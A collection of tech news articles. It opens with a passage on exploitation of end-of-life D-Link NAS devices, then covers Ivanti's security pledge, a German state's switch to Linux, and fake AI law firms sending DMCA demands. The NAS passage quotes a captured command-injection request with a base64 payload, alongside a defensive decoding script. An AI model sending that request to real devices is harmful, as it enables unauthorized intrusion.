GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=messagebus&passwd=&cmd=Y2QgL3RtcDsgcLnNo HTTP/1.1
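For triage, defenders can extract and decode the base64 segment of such a request. The sketch below is generic and hypothetical—it does not reproduce the Greynoise capture above (whose payload appears truncated), and the log line and payload ("bHMgL3RtcA==", which decodes to "ls /tmp") are invented for illustration:

```python
import base64
import urllib.parse

# Hypothetical captured request line; real exploit traffic may instead carry
# the payload in a repeated "cmd" parameter, as in the Greynoise example.
request_line = (
    "GET /cgi-bin/nas_sharing.cgi?dbg=1&user=messagebus&passwd="
    "&cmd=15&system=bHMgL3RtcA%3D%3D HTTP/1.1"
)

path = request_line.split()[1]
query = urllib.parse.urlparse(path).query
params = urllib.parse.parse_qs(query)  # percent-decodes the values

payload = params.get("system", [""])[0]
decoded = base64.b64decode(payload).decode(errors="replace")
print(decoded)  # the shell command the attacker tried to run
```

Spotting `nas_sharing.cgi` together with `user=messagebus` and an empty `passwd=` in web logs is itself a strong indicator of an exploitation attempt against these devices.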

Other malware families were also invoked in the exploit attempts.

The best defense against these attacks and others like them is to replace hardware once it reaches end of life. Barring that, users of EoL devices should at least ensure they’re running the most recent firmware. D-Link provides a dedicated support page for legacy devices where owners can locate the latest available firmware. Another effective protection is to disable UPnP and connections from remote Internet addresses unless they’re absolutely necessary and configured correctly.


ivanti-ceo-pledges-to-“fundamentally-transform”-its-hard-hit-security-model

Ivanti CEO pledges to “fundamentally transform” its hard-hit security model

Ivanti exploits in 2024 —

Part of the reset involves AI-powered documentation search and call routing.

Red unlocked icon amidst similar blue icons

Getty Images

Ivanti, the remote-access company whose remote-access products have been battered by severe exploits in recent months, has pledged a “new era,” one that “fundamentally transforms the Ivanti security operating model” backed by “a significant investment” and full board support.

CEO Jeff Abbott’s open letter promises to revamp “core engineering, security, and vulnerability management,” make all products “secure by design,” formalize cyber-defense agency partnerships, and commit to “sharing information and learning with our customers.” Among the details are the company’s promise to improve search abilities in Ivanti’s security resources and documentation portal, “powered by AI,” and an “Interactive Voice Response system” for routing calls and alerting customers about security issues, also “AI-powered.”

Ivanti CEO Jeff Abbott addresses the company’s “broad shift” in its security model.

Ivanti and Abbott seem to have been working on this presentation for a while, so it’s unlikely they could have known it would arrive just days after four new vulnerabilities were disclosed for its Connect Secure and Policy Secure gateway products, two of them rated high severity. Those vulnerabilities came two weeks after two others, rated critical, that allowed remote code execution. And those followed “a three-week spree of non-stop exploitation” in early February, one that left security directors scrambling to patch and restore services or, as federal civilian agencies did, rebuild their servers from scratch.

Because Ivanti makes VPN products that have been widely used in large organizations, including government agencies, it’s a rich target for threat actors and a target that’s seemed particularly soft in recent years. Ivanti’s Connect Secure, a VPN appliance often abbreviated as ICS, functions as a gatekeeper that allows authorized devices to connect.

Due to its wide deployment and always-on status, an ICS has been a rich target, particularly for nation-state-level actors and financially motivated intruders. ICS (formerly known as Pulse Connect Secure) has had zero-day vulnerabilities exploited previously, in 2019 and 2021. One Pulse Secure vulnerability exploit left currency-exchange firm Travelex working entirely from paper in early 2020 after the REvil ransomware group took advantage of the firm’s failure to patch a months-old vulnerability.

While some security professionals have given the firm credit, at times, for working hard to find and disclose new vulnerabilities, the sheer volume and cadence of vulnerabilities requiring serious countermeasures has surely stuck with some. “I don’t see how Ivanti survives as an enterprise firewall brand,” security researcher Jake Williams told the Dark Reading blog in mid-February.

Hence the open letter, the “new era,” the “broad shift,” and all the other pledges Ivanti has made. “We have already begun applying learnings from recent incidents to make immediate (emphasis Abbott’s) improvements to our own engineering and security practices. And there is more to come,” the letter states. Learnings, that is.


german-state-gov.-ditching-windows-for-linux,-30k-workers-migrating

German state gov. ditching Windows for Linux, 30K workers migrating

Open source FTW —

Schleswig-Holstein looks to succeed where Munich failed.

many penguins

Schleswig-Holstein, one of Germany’s 16 states, on Wednesday confirmed plans to move tens of thousands of systems from Microsoft Windows to Linux. The announcement follows previously established plans to migrate the state government off Microsoft Office in favor of open source LibreOffice.

As spotted by The Document Foundation, the government has apparently finished its pilot run of LibreOffice and is now announcing plans to expand to more open source offerings.

In 2021, the state government announced plans to move 25,000 computers to LibreOffice by 2026. At the time, Schleswig-Holstein said it had already been testing LibreOffice for two years.

As announced on Minister-President Daniel Günther’s webpage this week, the state government confirmed that it’s moving all systems to the Linux operating system (OS), too. Per a website-provided translation:

With the cabinet decision, the state government has made the concrete beginning of the switch away from proprietary software and towards free, open-source systems and digitally sovereign IT workplaces for the state administration’s approximately 30,000 employees.

The state government is offering a training program that it said it will update as necessary.

Regarding LibreOffice, the government maintains the possibility that some jobs may use software so specialized that they won’t be able to move to open source software.

In 2021, Jan Philipp Albrecht, then-minister for Energy, Agriculture, the Environment, Nature, and Digitalization of Schleswig-Holstein, discussed interest in moving the state government off of Windows.

“Due to the high hardware requirements of Windows 11, we would have a problem with older computers. With Linux we don’t have that,” Albrecht told Heise magazine, per a Google translation.

This week’s announcement also said that the Schleswig-Holstein government will ditch Microsoft SharePoint and Exchange/Outlook in favor of open source offerings Nextcloud and Open-Xchange, and Mozilla Thunderbird in conjunction with the Univention Active Directory connector.

Schleswig-Holstein is also developing an open source directory service to replace Microsoft’s Active Directory and an open source telephony offering.

Digital sovereignty dreams

Explaining the decision, the Schleswig-Holstein government’s announcement named enhanced IT security, cost efficiencies, and collaboration between different systems as its perceived benefits of switching to open source software.

Further, the government is pushing the idea of digital sovereignty, with Schleswig-Holstein Digitalization Minister Dirk Schrödter quoted in the announcement as comparing the concept’s value to that of energy sovereignty. The announcement also quoted Schrödter as saying that digital sovereignty isn’t achievable “with the current standard IT workplace products.”

Schrödter pointed to the state government’s growing reliance on cloud services and said that with related proprietary software, users have no influence on data flow and whether that data makes its way to other countries.

Schrödter also claimed that the move would help with the state’s budget by diverting money from licensing fees to “real programming services from our domestic digital economy” that could also create local jobs.

In 2021, Albrecht said the state was reaching its limits with proprietary software contracts because “license fees have continued to rise in recent years,” per Google’s translation.

“Secondly, regarding our goals for the digitalization of administration, open source simply offers us more flexibility,” he added.

At the time, Albrecht claimed that 90 percent of video conferences in the state government ran on the open source program Jitsi, which was advantageous during the COVID-19 pandemic because the state was able to quickly increase video conferencing capacity.

Additionally, he said that because the school portal was based on (unnamed) open source software, “we can design the interface flexibly and combine services the way we want.”

There are numerous other examples globally of government entities switching from Windows to Linux and other open source technology. Federal governments with particular interest in avoiding US-based technologies, including North Korea and China, are some examples. The South Korean government has also shared plans to move to Linux by 2026, and the city of Barcelona shared migration plans in 2018.

But some government bodies that have made the move regretted it and ended up crawling back to Windows. Vienna released the Debian-based distribution WIENUX in 2005 but gave up on migration by 2009.

In 2003, Munich announced it would be moving some 14,000 PCs off Windows and to Linux. In 2013, the LiMux project finished, but high associated costs and user dissatisfaction resulted in Munich announcing in 2017 that it would spend the next three years reverting to Windows.

Albrecht in 2021 addressed this failure when speaking to Heise, saying, per Google’s translation:

The main problem there was that the employees weren’t sufficiently involved. We do that better. We are planning long transition phases with parallel use. And we are introducing open source step by step where the departments are ready for it. This also creates the reason for further rollout because people see that it works.


fake-ai-law-firms-are-sending-fake-dmca-threats-to-generate-fake-seo-gains

Fake AI law firms are sending fake DMCA threats to generate fake SEO gains

Dewey Fakum & Howe, LLP —

How one journalist found himself targeted by generative AI over a keyfob photo.

Updated

A person made of many parts, similar to the attorney who handles both severe criminal law and copyright takedowns for an Arizona law firm.

Getty Images

If you run a personal or hobby website, getting a copyright notice from a law firm about an image on your site can trigger some fast-acting panic. As someone who has paid to settle a news service-licensing issue before, I can empathize with anybody who wants to make this kind of thing go away.

Which is why a new kind of angle-on-an-angle scheme can seem both obvious to spot and likely effective. Ernie Smith, the prolific, ever-curious writer behind the newsletter Tedium, received a “DMCA Copyright Infringement Notice” in late March from “Commonwealth Legal,” representing the “Intellectual Property division” of Tech4Gods.

The issue was with a photo of a keyfob from legitimate photo service Unsplash used in service of a post about a strange Uber ride Smith once took. As Smith detailed in a Mastodon thread, the purported firm needed him to “add a credit to our client immediately” through a link to Tech4Gods, and said it should be “addressed in the next five business days.” Removing the image “does not conclude the matter,” and should Smith not have taken action, the putative firm would have to “activate” its case, relying on DMCA 512(c) (which, in many readings, actually does grant relief should a website owner, unaware of infringing material, “act expeditiously to remove” said material). The email unhelpfully points to the main page of the Internet Archive so that Smith might review “past usage records.”

A slice of the website for Commonwealth Legal Services, with every word of that phrase, including “for,” called into question.

Commonwealth Legal Services

There are quite a few issues with Commonwealth Legal’s request, as detailed by Smith and 404 Media. Chief among them is that Commonwealth Legal, a firm theoretically based in Arizona (which is not a commonwealth), almost certainly does not exist. Despite the 2018 copyright displayed on the site, the firm’s website domain was seemingly registered on March 1, 2024, with a Canadian IP location. The address on the firm’s site leads to a location that, to say the least, does not match the “fourth floor” indicated on the website.

While the law firm’s website is stuffed full of stock images, so are many websites for professional services. The real tell is the site’s list of attorneys, most of whom, as 404 Media puts it, have “vacant, thousand-yard stares” common to AI-generated faces. AI detection firm Reality Defender told 404 Media that its service spotted AI generation in every attorney’s image, “most likely by a Generative Adversarial Network (GAN) model.”

Then there are the attorneys’ bios, which offer surface-level competence underpinned by bizarre setups. Five of the 12 supposedly come from acclaimed law schools at Harvard, Yale, Stanford, and the University of Chicago. The other seven seem to have graduated from the top five results you might get for “Arizona Law School.” Sarah Walker has a practice based on “Copyright Violation and Judicial Criminal Proceedings,” a quite uncommon pairing. Sometimes she is “upholding the rights of artists,” but she can also “handle high-stakes criminal cases.” Walker, it seems, couldn’t pick just one track at Yale Law School.

Why would someone go to the trouble of making a law firm out of NameCheap, stock art, and AI images (and seemingly AI-generated copy) to send quasi-legal demands to site owners? Backlinks, that’s why. Backlinks are links from a site that Google (or others, but almost always Google) holds in high esteem to a site trying to rank up. Whether spammed, traded, generated, or demanded through a fake firm, backlinks power the search engine optimization (SEO) gray, to very dark gray, market. For all their touted algorithmic (and now AI) prowess, search engines have always had a hard time gauging backlink quality and context, so some site owners still buy backlinks.

The owner of Tech4Gods told 404 Media’s Jason Koebler that he did buy backlinks for his gadget review site (with “AI writing assistants”). He disclaimed owning the disputed image or any images and made vague suggestions that a disgruntled former contractor may be trying to poison his ranking with spam links.

Asked if he had heard back from “Commonwealth Legal” now that five business days were up, Ernie Smith tells Ars: “No, alas.”

This post was updated at 4:50 p.m. Eastern to include Ernie Smith’s response.
